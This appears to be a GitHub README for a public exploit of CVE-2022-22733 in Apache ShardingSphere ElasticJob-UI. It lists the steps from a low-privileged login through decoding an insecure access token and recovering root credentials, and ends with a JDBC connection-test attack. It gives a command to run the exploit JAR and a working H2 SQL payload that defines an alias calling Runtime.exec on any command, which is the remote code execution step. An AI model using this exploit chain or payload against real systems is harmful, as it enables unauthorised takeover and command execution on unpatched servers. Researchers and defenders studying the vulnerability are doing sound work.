Skip to content

Apache ShardingSphere ElasticJob-UI Privilege Escalation & RCE Exploit

Notifications You must be signed in to change notification settings

Zeyad-Azima/CVE-2022-22733

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

CVE-2022-22733

CVE-2022-22733 is a vulnerabilit that affects Apache ShardingSphere ElasticJob-UI 3.0.0 and below versions, The vulnerability lead to Privilege Escalation. But, with abusing of the escalated privileges a JDBC Attack it can preformed & achieve RCE. You can read the vulnerability analysis from Here & The exploit writing blog step by step from Here.

elasticjob

The Exploit Works as the following:

  • Login with the low-privileged account.
  • Obtain the unsecure generated accessToken.
  • Decode the unsecure generated accessToken.
  • Parse the decoded data from the accessToken.
  • Retrive root account credentials from the parsed data.
  • Login with the root account credentials and obtain a full privileges on the application.
  • Send a Connection Test request with abusing of the``JDBC` Attack.

Usage

You can download JAR file from here & Source code here.

  • Execute jar:
java -jar CVE-2022-22733.jar
  • SQL script code:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')

Demo

idea64_5Ru1DeWcKE